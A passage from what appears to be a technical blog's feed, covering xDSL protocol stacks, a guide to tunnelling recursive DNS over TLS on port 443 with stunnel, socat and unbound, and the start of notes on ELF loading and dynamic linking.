Details of the interfaces can be found in TR-059 page\n9.

\n\n

The T interface

\n
\n
\n        [ IP    ]\n        [ PPP   ]\n[ IP  ] [ PPPoE ]\n[ Eth ] [ Eth   ]\n[ PHY ] [ PHY   ]\n
\n
\n\n

The U Interface

\n

The U interface is the interface between the B-NT (the xDSL modem) and\nthe Access Node (DSLAM):

\n
\n
\n          [IP     ]\n          [PPP    ]\n[IP     ] [PPPoE  ]           [IP     ]\n[Eth    ] [Eth    ] [IP     ] [PPP    ]         [IP   ]\n[RFC2684] [RFC2684] [RFC2684] [RFC2684]         [PPP  ]\n[AAL5   ] [AAL5   ] [AAL5   ] [AAL5   ] [IP   ] [PPPoE]\n[ATM    ] [ATM    ] [ATM    ] [ATM    ] [Eth  ] [Eth  ] [Eth]\n[PHY    ] [PHY    ] [PHY    ] [PHY    ] [PHY  ] [PHY  ] [PHY]\n\n IPoEoA    PPPoEoA   IPoA      PPPoA     IPoE    PPPoE   Eth\n a         b         c         d         e       f       g\n
\nProtocol stacks for the U interface\n
\n\n

TR-043\ncompares the different ATM-based solutions.

\n

Notes:

\n\n

The V Interface

\n
\n
\n                              [IP  ]\n[IP     ] [PPP    ]           [PPP ]\n[802.1ad] [802.1ad] [802.1ad] [AAL5]\n[Eth    ] [Eth    ] [Eth    ] [ATM ]\n[PHY    ] [PHY    ] [PHY    ] [PHY ]\n IPoE      PPPoE\n a         b         c\n
\nProtocol stacks for the V interface\n
\n\n

More stuff

\n

Multiplexing over AAL5

\n

RFC2684 defined two methods of\nprotocol multiplexing over AAL5:

\n\n
\n
\n                 [            ]\n                 [(SNAP|NLPID)]\n[    ]           [LLC         ]\n[AAL5]           [AAL5        ]\n[ATM ]           [ATM         ]\nVC Multiplexing  LLC Encapsulation\n
\nEncapsulation over AAL5\n
\n\n

L2TP and RADIUS message exchange

\n
\n[Client] [BRAS]          [LNS]\n   |       | [RADIUS Proxy]|  [RADIUS]\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  I] Initial challenge\n   |       |       |       |     |\n   |<------|       |       |     |  CHAP Challenge\n   |------>|       |       |     |  CHAP Success\n   |       |------>|------------>|  RADIUS Access-Request\n   |       |<------|<------------|  RADIUS Access-Accept\n   |       |       |       |     |    Tunnel-Type=L2TP\n   |       |       |       |     |    Tunnel-Medium-Type=IPv4\n   |       |       |       |     |    Tunnel-Server-Endpoint=lns.example.com\n   |       |       |       |     |    Tunnel-Password=potato\n   |<------|       |       |     |  CHAP Success\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  II] Tunnel establishment\n   |       |       |       |     |\n   |       |-------------->|     |  L2TP Start-Control-Connection-Request\n   |       |<--------------|     |  L2TP Start-Control-Connection-Reply\n   |       |-------------->|     |  L2TP Start-Control-Connection-Connected\n   |       |<--------------|     |  L2TP Zero-Length Body Ack.\n   |       |       |       |     |\n   |       |       |       |     |  III] Call establishment\n   |       |       |       |     |\n   |       |-------------->|     |  L2TP Incoming-Call-Request\n   |       |<--------------|     |  L2TP Incoming-Call-Reply\n   |       |-------------->|     |  L2TP Incoming-Call-Connected\n   |       |<--------------|     |  L2TP Zero-Length Body Ack.\n   |       |       |       |     |\n   |       |       |       |     |\n   |       |       |       |     |  IV] New challenge\n   |       |       |       |     |\n   |<----------------------|     |  CHAP Challenge\n   |---------------------->|     |  CHAP Response\n   |       |       |       |---->|  RADIUS Access-Request\n   |       |       |       |<----|  RADIUS Access-Accept\n 
  |<----------------------|     |  CHAP Success\n   |       |       |       |     |\n
\n\n

References

\n\n

Recommendation of PPP over ATM at the U interface for ATM end-to-end network.

\n\n

Describes PPPoEoA, IPoEoA, IPoA. At this time ATM was always used so\n PPPoEoA was named PPPoE and IPoEoA was named IPoE.

\n\n

Suggests at least a /60 IPv6 delegated prefix for the home network and\n recommends a /56. Suggests up to a /48 for large organisations.

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/02/14/recursive-dns-over-tls-over-tcp-443/", "title": "Recursive DNS over TLS over TCP 443", "url": "https://www.gabriel.urdhr.fr/2015/02/14/recursive-dns-over-tls-over-tcp-443/", "date_published": "2015-02-14T00:00:00+01:00", "date_modified": "2017-05-15T00:00:00+02:00", "tags": ["computer", "network", "dns", "internet", "tls"], "content_html": "

You might want to use an open recursive DNS server if your ISP's DNS\nserver is lying. However, if your network/ISP is intercepting all DNS\nrequests, a standard open recursive DNS server won't help. You might\nhave more luck by using an alternative port or by forcing the usage of\nTCP (use-vc option in recent versions of glibc) but it might not\nwork. Alternatively, you could want to talk to a (trusted) remote\nrecursive DNS server over a secure channel such as TLS: by using DNS\nover TLS over TCP port 443 (the HTTP/TLS port), you should be able to\navoid most filtering between you and the recursive server.

\n

Update (2016-05-18):\nRFC7858, Specification for DNS over TLS,\ndescribes the use of DNS over TLS (using TCP port 853).

\n

Update (2017-04-08):\nAll those solutions use\none TCP (and TLS) connection per DNS request\nwhich is quite inefficient.

\n

Update (2017-05-17):\nThis was written before DNS/TLS was a thing\n(and before it was natively implemented in resolvers).\nSee DNS Privacy\nfor up-to-date instructions.

\n

Warning! You might not want to use DNS/TLS to bypass state\ncensorship (you probably want some sort of\nstealthy VPN):

\n\n

Summary

\n

On the server-side:

\n\n

On the client-side:

\n\n

Generic solution:

\n
\n          cache      verify TLS\n\n[DNS ]<->[DNS     ]<->------------------------------->[DNS]\n[    ]   [        ]<->[   |TLS]----------->[TLS|  ]   [   ]\n[UDP*]<->[UDP*|TCP]<->[TCP    ]<---------->[TCP   ]<->[TCP]\n[IP  ]<->[IP      ]<->[IP     ]<---------->[IP    ]<->[IP ]\nStub R.   Forwarder   TLS Init. Internet   TLS Term.  Recursive\n         (unbound)    (stunnel)            (stunnel)\n\n*: or TCP if the reply is too long\n
\n\n

Unbound can be used directly for TLS on the server side:

\n
\n          cache      verify TLS\n\n[DNS ]<->[DNS     ]<->-------------------->[DNS]\n[    ]   [        ]<->[   |TLS]----------->[TLS]\n[UDP*]<->[UDP*|TCP]<->[TCP    ]<---------->[TCP]\n[IP  ]<->[IP      ]<->[IP     ]<---------->[IP ]\nStub R.   Forwarder   TLS Init.  Internet  Recursive\n          (unbound)   (stunnel)            (unbound)\n
\n\n

However, it is currently not safe to use unbound for DNS/TLS on the\nclient side because unbound does not verify the remote\ncertificate1\n(MITM attack). This solution is not safe:

\n
\n          cache       MITM!\n\n[DNS ]<->[DNS     ]<--------->[DNS]\n[    ]   [    |TLS]<--------->[TLS]\n[UDP*]<->[UDP*|TCP]<--------->[TCP]\n[IP  ]<->[IP      ]<--------->[IP ]\nStub R.  Forwarder  Internet Recursive\n         (unbound)           (unbound)\n
\n\n

Software used

\n

stunnel

\n

stunnel can be used to add/remove TLS\nlayers:

\n\n

Protocol stack:

\n
\n       verify TLS\n\n[DNS]<-------------------------------->[DNS]\n[   ]   [  |TLS]<---------->[TLS|  ]   [   ]\n[TCP]<->[TCP   ]<---------->[TCP   ]<->[TCP]\n[IP ]<->[IP    ]<---------->[IP    ]<->[IP ]\nStub R. TLS Init. Internet  TLS Term.  Recursive\n        (stunnel)           (stunnel)\n
\n\n

The issue is that usually the resolver will first try to make the\nquery over UDP. If there is no UDP reply, the resolver will not\nswitch to TCP. We need a way to force the resolver to use TCP.

\n

libc

\n

The GNU libc resolver has an (undocumented) option, use-vc (see\nresolv/res_init.c) to force the usage of TCP for DNS resolutions.\nThis option is available since glibc v2.14 (available since Debian\nJessie, since Ubuntu 12.04).

\n

In /etc/resolv.conf:

\n
options use-vc\nnameserver 2001:913::8\n
\n\n\n

With the RES_OPTIONS environment variable:

\n
RES_OPTIONS=\"use-vc\"\nexport RES_OPTIONS\n
\n\n\n

Example:

\n
$ #Using UDP (SOCK_DGRAM):\n$ strace getent hosts www.ldn-fai.net 2>&1 | grep -e PF_INET\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 3\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4\nsocket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 3\n\n$ #Using TCP (SOCK_STREAM):\n$ RES_OPTIONS=use-vc strace getent hosts www.ldn-fai.net 2>&1 | \\\n  grep -e PF_INET\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\n
\n\n\n

Other libc implementations:

\n\n

Similar libraries:

\n\n

Truncate all answers

\n

The option to force the usage of TCP for DNS resolution is not\navailable everywhere (many stub resolvers do not handle this option and\nsome software do not use the system resolver). A hack to force the\nstub resolver to use TCP would be to have a simple local DNS/UDP service\nwhich always replies with the truncated bit set (TC=1): this should\nforce most implementations to switch to TCP (and talk to the local\nstunnel process):

\n
\n[Resolver] [Fake service] [local stunnel] // [Remote recursive]\n    |          |             |                 |\n    |--------->|             |                 |  Query over UDP\n    |<---------|             |                 |  Response over UDP (TC=1)\n    |----------------------->|---------------->|  Query over TCP\n    |<-----------------------|<----------------|  Response over TCP\n
\n\n

TruncateDNSd is a\nproof-of-concept implementation of this idea: I'm not sure there is a\nclean way to do this so it might remain a proof-of-concept.

\n
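To make the TC=1 idea concrete, here is a sketch of what the header of such a truncated reply looks like. The ID 0x1234 is arbitrary: a real fake service would have to copy the ID (and question section) from each incoming query before setting the flags.

```shell
# DNS header flags word: QR is bit 15, TC is bit 9, so QR|TC = 0x8200.
# Build a 12-byte header (ID 0x1234, flags 0x8200, all counts zero)
# and dump it; octal escapes: \022\064 = 0x12 0x34, \202 = 0x82.
printf '\022\064\202\000\000\000\000\000\000\000\000\000' > tc-reply.bin
od -A n -t x1 tc-reply.bin
```

The dump should show the bytes 12 34 82 00 followed by eight zero bytes.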

Unbound

\n

The correct solution is to have a local DNS recursive server which is\nable to delegate to a remote recursive DNS over TCP:\nUnbound can talk (either as a server or as a\nclient) over TCP (tcp-upstream) or over TLS/TCP (ssl-upstream,\nssl-service-key, ssl-service-pem, ssl-port).

\n

However, it seems it cannot validate the certificate (v1.5.1):

\n\n

Those two limitations can be mitigated by using a dedicated TLS\nencapsulation daemon such as stunnel or socat.

\n

Server-side configuration

\n

Using stunnel

\n

stunnel configuration:

\n
; /etc/stunnel/dns.conf\nsetuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\ncert=/etc/stunnel/dns.pem\naccept=443\nconnect=53\n
\n\n\n

Keypair and certificate generation:

\n
openssl req -days 360 -nodes -new -x509 -keyout key.pem -out cert.pem \\\n  -subj \"/CN=$MY_IP\" -sha256 -newkey rsa:2048\n(cat key.pem ; echo ; cat cert.pem ; echo ) > dns.pem\nsudo chown root:root dns.pem\nsudo chmod 440 dns.pem\nsudo mv dns.pem /etc/stunnel/\n
\n\n\n

Protocol stack:

\n
\n[DNS]<----------------------->[DNS]\n[TLS]<------------>[TLS|  ]   [   ]\n[TCP]<------------>[TCP   ]<->[TCP]\n[IP ]<------------>[IP    ]<->[IP ]\nResolver Internet  TLS Term.  Recursive\n                   (stunnel)\n
\n\n

Using unbound

\n

Unbound can be configured to use TLS directly with ssl-port,\nssl-service-key, ssl-service-pem.

\n

Client-side configuration

\n

Using socat

\n
sudo socat \\\n  TCP4-LISTEN:53,bind=127.0.0.1,fork,nodelay,su=nobody \\\n  OPENSSL:80.67.188.188:443,verify=1,cafile=dns.pem,nodelay\n
\n\n\n

With /etc/resolv.conf:

\n
options use-vc\nnameserver 127.0.0.1\n
\n\n\n

Protocol stack:

\n
\n      verify TLS\n\n[DNS]<--------------------[DNS]\n[   ]   [  |TLS]<-------->[TLS]\n[TCP]<->[TCP   ]<-------->[TCP]\n[IP ]<->[IP    ]<-------->[IP ]\nStub R.  socat   Internet  Recursive\n
\n\n

Programs and libraries trying to parse resolv.conf directly without\nusing the res_* functions (for example lwresd) will usually ignore\nuse-vc and fail to work if no DNS server replies on UDP.

\n

Using stunnel

\n

This is the client side stunnel configuration:

\n
setuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nclient=yes\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\nCAfile=/etc/stunnel/dns.pem\naccept=127.0.0.1:53\nconnect=80.67.188.188:443\nverify=4\n
\n\n\n

with the same resolv.conf.

\n

Protocol stack:

\n
\n       verify TLS\n\n[DNS]<--------------------->[DNS]\n[   ]   [  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---------->[IP ]\nStub R. TLS Init. Internet  Recursive\n        (stunnel)\n
\n\n

Using unbound

\n

Warning: This configuration is vulnerable to\nMITM attacks1.\nUse the unbound + stunnel configuration instead.

\n

A better solution would be to install a local unbound. The local\nunbound instance will cache the results and avoid a higher latency due\nto TCP and TLS initialisation:

\n
server:\n  # verbosity: 7\n  ssl-upstream: yes\nforward-zone:\n  name: \".\"\n  forward-addr: 80.67.188.188@443\n
\n\n\n
# /etc/resolv.conf\nnameserver 127.0.0.1\n
\n\n\n

Protocol stack:

\n
\n     DNSSEC valid.\n         cache\n\n[DNS]<->[DNS   ]<---------->[DNS]\n[   ]   [  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---------->[IP ]\nStub R. Forwarder Internet  Recursive\n        (unbound)\n
\n\n

As a bonus, you can enable local DNSSEC validation.
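For example, DNSSEC validation can be enabled in the unbound configuration by pointing it at the root trust anchor (the path below is the Debian default, maintained by unbound-anchor; adjust it for your distribution):

```
server:
  # Enable DNSSEC validation with the root trust anchor
  # (Debian default path; kept up to date by unbound-anchor).
  auto-trust-anchor-file: "/var/lib/unbound/root.key"
```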

\n

Using unbound and stunnel

\n

Unbound currently does not verify the validity of the remote X.509\ncertificate. In order to avoid MITM attacks, you might want to add a\nlocal stunnel between unbound and the remote DNS server.

\n

The unbound configuration uses plain TCP:

\n
server:\n  # verbosity:7\n  tcp-upstream: yes\n  do-not-query-localhost: no\nforward-zone:\n  name: \".\"\n  forward-addr: 127.0.0.1@1234\n
\n\n\n

Issues:

\n\n

On Debian Jessie, this is handled by\n /etc/resolvconf/update.d/unbound and can be disabled by setting\n RESOLVCONF_FORWARDERS=false in /etc/default/unbound.

\n

A local stunnel instance handles the TLS encapsulation (with remote\ncertificate verification):

\n
setuid=stunnel4\nsetgid=stunnel4\npid=/var/run/stunnel4/dns.pid\noutput=/var/log/stunnel4/dns.log\nsocket = l:TCP_NODELAY=1\nsocket = r:TCP_NODELAY=1\n\n[dns]\nclient=yes\nCAfile=/etc/stunnel/dns.pem\naccept=127.0.0.1:1234\nconnect=80.67.188.188:443\nverify=4\n
\n\n\n

Protocol stack:

\n
\n     DNSSEC valid.\n         cache       verify TLS\n\n[DNS]<->[DNS   ]<------------------------>[DNS]\n[   ]   [      ]<---->[  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---->[IP    ]<---------->[IP ]\nClient   Forwarder    TLS Init. Internet   Recursive\n         (unbound)    (stunnel)\n
\n\n

Verifying that the setup is correct

\n
# We should see the local traffic to your unbound instance:\nsudo tcpdump -i lo \"port 53\"\n\n# We should see the traffic from unbound to the local stunnel instance:\nsudo tcpdump -i lo \"port 1234\"\n\n# We should not see outgoing DNS traffic:\nsudo tcpdump -i eth0 \"port 53\"\n\n# Make DNS requests and see if everything works as expected:\ndig attempt45.example.com\n\n# Flush the cache:\nsudo unbound-control flush_zone .\n\n# Make DNS requests directly on the tunnel (bypass unbound):\ndig +tcp @127.0.0.1 -p 1234 attempt46.example.com\n\n# Display the list of forward servers:\nsudo unbound-control list_forwards\n
\n\n\n

What about DNSSEC?

\n

If your local resolver verifies the authenticity of the DNS reply with\nDNSSEC, it will be able to detect a spoofed DNS reply and reject\nit. But it will still not be able to get the correct reply. So you\nshould use DNSSEC, but you might still want to use DNS/TLS.

\n

TLS configuration

\n

See the Mozilla SSL Configuration\nGenerator:

\n

stunnel

\n
[dns]\n# Append this to the service [dns] section:\noptions = NO_SSLv2\noptions = NO_SSLv3\noptions = NO_TLSv1\noptions = CIPHER_SERVER_PREFERENCE\nciphers = ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK\n
\n\n\n

References

\n

TLS for DNS:

\n\n

An IETF working group addressing privacy issues of DNS exchanges, with drafts:

\n\n

This setup directly connects the UDP socket with the TCP socket with\n socat; as a consequence, the TLS stream does not transport the DNS\n requests in the TCP\n wire-format. I\n suspect there would be framing problems when converting from TCP to\n UDP.

\n\n

Open recursive DNS server:

\n\n

DNS censorship:

\n\n

DNS monitoring:

\n\n
\n
\n
    \n
  1. \n

    In the unbound code, the TLS outgoing connections are set up in\nvoid* connect_sslctx_create(char* key, char* pem, char* verifypem).\nThis function only calls SSL_CTX_set_verify()\nif the verifypem parameter is not NULL.\nHowever, connect_sslctx_create() is always\ncalled with verifypem set to NULL.

    \n

    You can verify this by configuring a local DNS/TLS service:

    \n

    \nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 256 -nodes\nsocat -v OPENSSL-LISTEN:1234,fork,certificate=./cert.pem,key=./key.pem TCP:80.67.188.188:53\n
    \n

    and configure unbound to use it as a TLS upstream:

    \n

    \nserver:\n  # verbosity:7\n  ssl-upstream: yes\n  do-not-query-localhost: no\nforward-zone:\n  name: \".\"\n  forward-addr: 127.0.0.1@1234\n
    \u00a0\u21a9\u21a9\n
  2. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/22/elf-linking/", "title": "ELF loading and dynamic linking", "url": "https://www.gabriel.urdhr.fr/2015/01/22/elf-linking/", "date_published": "2015-01-22T00:00:00+01:00", "date_modified": "2015-01-22T00:00:00+01:00", "tags": ["computer", "system", "elf", "linker", "linux", "multiarch"], "content_html": "

Some notes on ELF loading and dynamic linking mainly for GNU userland\n(ld.so, libc, libdl) running on top of the Linux kernel. Some\nprior knowledge of the topic (virtual memory, shared objects,\nsections) might be useful to understand this.

\n

ELF introduction

\n

The ELF format is a standard file format used for different types of\nobjects:

\n\n

Static libraries (.a files, ar archives) are not ELF files but\narchives of .o files.

\n

More information about the ELF format can be found in\nman elf,\nelf.h,\nthe System V specification,\nthe LSB\n(for Linux-specific stuff).\nThe readelf tool can be used to visualise the fields of ELF files and is\nvery useful to understand what information is in the ELF files, correlate\nthem with /proc/${pid}/maps and understand how the loading and linking of\nprograms work on ELF-based systems.

\n

ELF header

\n

The ELF header is defined as:

\n
typedef struct\n{\n  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */\n  ElfXX_Half    e_type;             /* Object file type */\n  ElfXX_Half    e_machine;          /* Architecture */\n  ElfXX_Word    e_version;          /* Object file version */\n  ElfXX_Addr    e_entry;            /* Entry point virtual address */\n  ElfXX_Off     e_phoff;            /* Program header table file offset */\n  ElfXX_Off     e_shoff;            /* Section header table file offset */\n  ElfXX_Word    e_flags;            /* Processor-specific flags */\n  ElfXX_Half    e_ehsize;           /* ELF header size in bytes */\n  ElfXX_Half    e_phentsize;        /* Program header table entry size */\n  ElfXX_Half    e_phnum;            /* Program header table entry count */\n  ElfXX_Half    e_shentsize;        /* Section header table entry size */\n  ElfXX_Half    e_shnum;            /* Section header table entry count */\n  ElfXX_Half    e_shstrndx;         /* Section header string table index */\n} ElfXX_Ehdr;\n
\n\n\n

where XX is either 32 (for ELF-32) or 64 (for ELF-64).

\n

The ElfW(type) macro can be used to refer to the native ELF types:

\n
#define ElfW(type)  _ElfW (Elf, __ELF_NATIVE_CLASS, type)\n#define _ElfW(e,w,t)    _ElfW_1 (e, w, _##t)\n#define _ElfW_1(e,w,t)  e##w##t\n
\n\n\n

Which is used as:

\n
ElfW(Ehdr)* native_header;\nElfW(Off)   native_offset;\nElfW(Addr)  native_address;\n
\n\n\n

The ELF header can be read with readelf -h:

\n
$ readelf -h /bin/sh\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              DYN (Shared object file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x404c\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          123672 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         9\n  Size of section headers:           64 (bytes)\n  Number of section headers:         27\n  Section header string table index: 26\n
\n\n\n

The e_ident field contains:

\n\n

Static binary

\n

Let's start with the loading of statically linked binaries:

\n
    \n
  1. the kernel maps the program in memory (and the vDSO);
  2. \n
  3. the kernel sets up the stack and registers (passing information such as the\n argument and environment variables) and calls the main program entry point.
  4. \n
\n

The executable is loaded at a fixed address and no relocation is needed.

\n

Mapping the executable in memory

\n

The program headers define the in-memory layout of the program and\nthe location of the information needed for loading, dynamic linking\nand more generally at runtime (for dynamic symbol resolution,\nexception handling, etc.). The program headers are located by the\nfields e_phoff, e_phentsize and e_phnum of the ELF header. Each\nprogram header is defined as:

\n
// The fields are in a slightly different order for Elf32.\ntypedef struct\n{\n  Elf64_Word    p_type;                 /* Segment type */\n  Elf64_Word    p_flags;                /* Segment flags */\n  Elf64_Off     p_offset;               /* Segment file offset */\n  Elf64_Addr    p_vaddr;                /* Segment virtual address */\n  Elf64_Addr    p_paddr;                /* Segment physical address */\n  Elf64_Xword   p_filesz;               /* Segment size in file */\n  Elf64_Xword   p_memsz;                /* Segment size in memory */\n  Elf64_Xword   p_align;                /* Segment alignment */\n} Elf64_Phdr;\n
\n\n\n

The readelf -l command can be used to see the program headers and\ntells us which sections are located in which segments by comparing the\nprogram headers and the section headers (the sections are explained in\nthe next section).

\n
$ readelf -l /bin/bash-static\n\nElf file type is EXEC (Executable file)\nEntry point 0x403d0e\nThere are 6 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000001cda14 0x00000000001cda14  R E    200000\n  LOAD           0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x000000000000a900 0x0000000000013720  RW     200000\n  NOTE           0x0000000000000190 0x0000000000400190 0x0000000000400190\n                 0x0000000000000044 0x0000000000000044  R      4\n  TLS            0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x0000000000000070 0x00000000000000a8  R      8\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x00000000000001a0 0x00000000000001a0  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00     .note.ABI-tag .note.gnu.build-id .rela.plt .init .plt .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table\n   01     .tdata .init_array .fini_array .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs\n   02     .note.ABI-tag .note.gnu.build-id\n   03     .tdata .tbss\n   04\n   05     .tdata .init_array .fini_array .jcr .data.rel.ro .got\n
\n\n\n

Each PT_LOAD entry defines a segment which is mapped by the kernel\nin memory: the kernel maps the relevant part of the file in the\nvirtual address space of the process. Each PT_LOAD entry contains:

\n\n

We can check this with:

\n
$ gdb /bin/bash-static -s ls\n(gdb) break main\n(gdb) catch syscall execve\n(gdb) run\nStarting program: /bin/bash-static -c ls\n\nCatchpoint 1 (call to syscall execve), 0x00000000004ffb97 in ?? ()\n(gdb) !cat /proc/$(pgrep bash-static)/maps\n00400000-005ce000 r-xp 00000000 08:11 524423             /bin/bash-static\n007cd000-007d9000 rw-p 001cd000 08:11 524423             /bin/bash-static\n007d9000-00805000 rw-p 00000000 00:00 0                  [heap]\n7ffff7e69000-7ffff7e70000 r--s 00000000 08:11 1192265    /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache\n7ffff7e70000-7ffff7ffb000 r--p 00000000 08:11 787456     /usr/lib/locale/locale-archive\n7ffff7ffb000-7ffff7ffd000 r-xp 00000000 00:00 0          [vdso]\n7ffff7ffd000-7ffff7fff000 r--p 00000000 00:00 0          [vvar]\n7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0          [stack]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]\n
\n\n\n

The memory mappings of the bash-static executable correspond to the\nPT_LOAD entries of the ELF file:

\n\n

The size of this second segment is larger in memory than on file: the\nremaining bytes are filled with zeros (.bss).

\n

Sections

\n

The ELF file contains a list of sections as well: the sections are not\nused at runtime but can be used to understand the different parts of\nthe binary and are used by debuggers.

\n

The section headers describe the sections in the ELF object. Those\nheaders are located using the e_shoff, e_shentsize and e_shnum\nfields of the ELF header. Each section header is defined as:

\n
typedef struct\n{\n  ElfXX_Word    sh_name;                /* Section name (string tbl index) */\n  ElfXX_Word    sh_type;                /* Section type */\n  ElfXX_Word    sh_flags;               /* Section flags */\n  ElfXX_Addr    sh_addr;                /* Section virtual addr at execution */\n  ElfXX_Off     sh_offset;              /* Section file offset */\n  ElfXX_Word    sh_size;                /* Section size in bytes */\n  ElfXX_Word    sh_link;                /* Link to another section */\n  ElfXX_Word    sh_info;                /* Additional section information */\n  ElfXX_Word    sh_addralign;           /* Section alignment */\n  ElfXX_Word    sh_entsize;             /* Entry size if section holds table */\n} ElfXX_Shdr;\n
\n\n\n

readelf -S displays the sections headers:

\n
$ readelf -S /bin/bash-static\nThere are 28 section headers, starting at offset 0x1d8898:\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [ 0]                   NULL             0000000000000000  00000000\n       0000000000000000  0000000000000000           0     0     0\n  [ 1] .note.ABI-tag     NOTE             0000000000400190  00000190\n       0000000000000020  0000000000000000   A       0     0     4\n  [ 2] .note.gnu.build-i NOTE             00000000004001b0  000001b0\n       0000000000000024  0000000000000000   A       0     0     4\n  [ 3] .rela.plt         RELA             00000000004001d8  000001d8\n       00000000000001b0  0000000000000018  AI       0     5     8\n  [ 4] .init             PROGBITS         0000000000400388  00000388\n       000000000000001a  0000000000000000  AX       0     0     4\n  [ 5] .plt              PROGBITS         00000000004003b0  000003b0\n       0000000000000120  0000000000000000  AX       0     0     16\n  [ 6] .text             PROGBITS         00000000004004d0  000004d0\n       0000000000159ab4  0000000000000000  AX       0     0     16\n  [ 7] __libc_freeres_fn PROGBITS         0000000000559f90  00159f90\n       0000000000000d9c  0000000000000000  AX       0     0     16\n  [ 8] __libc_thread_fre PROGBITS         000000000055ad30  0015ad30\n       00000000000000e0  0000000000000000  AX       0     0     16\n  [ 9] .fini             PROGBITS         000000000055ae10  0015ae10\n       0000000000000009  0000000000000000  AX       0     0     4\n  [10] .rodata           PROGBITS         000000000055ae40  0015ae40\n       00000000000469e0  0000000000000000   A       0     0     64\n  [11] __libc_subfreeres PROGBITS         00000000005a1820  001a1820\n       00000000000000a0  0000000000000000   A       0     0     8\n  [12] __libc_atexit     PROGBITS         00000000005a18c0  001a18c0\n       0000000000000008  
0000000000000000   A       0     0     8\n  [13] __libc_thread_sub PROGBITS         00000000005a18c8  001a18c8\n       0000000000000010  0000000000000000   A       0     0     8\n  [14] .eh_frame         PROGBITS         00000000005a18d8  001a18d8\n       000000000002bff4  0000000000000000   A       0     0     8\n  [15] .gcc_except_table PROGBITS         00000000005cd8cc  001cd8cc\n       0000000000000148  0000000000000000   A       0     0     1\n  [16] .tdata            PROGBITS         00000000007cde60  001cde60\n       0000000000000070  0000000000000000 WAT       0     0     8\n  [17] .tbss             NOBITS           00000000007cded0  001cded0\n       0000000000000038  0000000000000000 WAT       0     0     8\n  [18] .init_array       INIT_ARRAY       00000000007cded0  001cded0\n       0000000000000010  0000000000000000  WA       0     0     8\n  [19] .fini_array       FINI_ARRAY       00000000007cdee0  001cdee0\n       0000000000000010  0000000000000000  WA       0     0     8\n  [20] .jcr              PROGBITS         00000000007cdef0  001cdef0\n       0000000000000008  0000000000000000  WA       0     0     8\n  [21] .data.rel.ro      PROGBITS         00000000007cdf00  001cdf00\n       00000000000000e4  0000000000000000  WA       0     0     32\n  [22] .got              PROGBITS         00000000007cdfe8  001cdfe8\n       0000000000000010  0000000000000008  WA       0     0     8\n  [23] .got.plt          PROGBITS         00000000007ce000  001ce000\n       00000000000000a8  0000000000000008  WA       0     0     8\n  [24] .data             PROGBITS         00000000007ce0c0  001ce0c0\n       000000000000a6a0  0000000000000000  WA       0     0     64\n  [25] .bss              NOBITS           00000000007d8780  001d8760\n       0000000000008d88  0000000000000000  WA       0     0     64\n  [26] 